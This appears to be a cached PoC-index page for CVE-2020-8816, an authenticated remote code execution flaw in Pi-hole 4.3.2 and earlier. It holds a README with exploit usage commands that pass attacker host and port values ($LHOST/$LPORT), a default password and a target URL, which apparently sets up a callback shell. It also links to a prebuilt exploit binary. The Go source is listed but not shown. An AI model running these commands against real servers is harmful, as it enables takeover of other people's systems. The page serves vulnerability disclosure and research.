CVE-2020-8816 PoC — Pi-hole 操作系统命令注入漏洞

Source

https://github.com/team0se7en/CVE-2020-8816

Associated Vulnerability

Title:Pi-hole 操作系统命令注入漏洞 (CVE-2020-8816)
Description:Pi-hole是Pi-hole公司的一款网络级广告拦截应用程序。 Pi-hole Web interface 4.3.2及之前版本中存在安全漏洞。攻击者可利用该漏洞执行任意命令。

Description

Pi-hole ( <= 4.3.2)  authenticated remote code execution.

Readme

## CVE 2020-8816 :

[Pi-hole](https://fr.wikipedia.org/wiki/Pi-hole) (versions <= 4.3.2 ) is affected by a Remote Code Execution vulnerability. An  authenticated user of the Web portal can execute arbitrary command with  the underlying server with the privileges of the local user executing  the service. 

## EXAMPLE :

` go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/ `

or download the binary [CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816/releases/tag/0.0.1) :

` ./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/ ` 

<img src="src/1.png" alt="page" style="zoom:25%;" /> 

<img src="src/2.png" alt="page" style="zoom:25%;" /> 

<img src="src/3.png" alt="page" style="zoom:25%;" /> 

## References :

- https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/

File Snapshot


 [4.0K]  /data/pocs/ccda3db15bf87da9aa8ea94485224fbc778379c3
├── [2.9K]  CVE-2020-8816.go
├── [ 902]  README.md
└── [4.0K]  src
    ├── [ 26K]  1.png
    ├── [ 27K]  2.png
    └── [ 30K]  3.png

1 directory, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!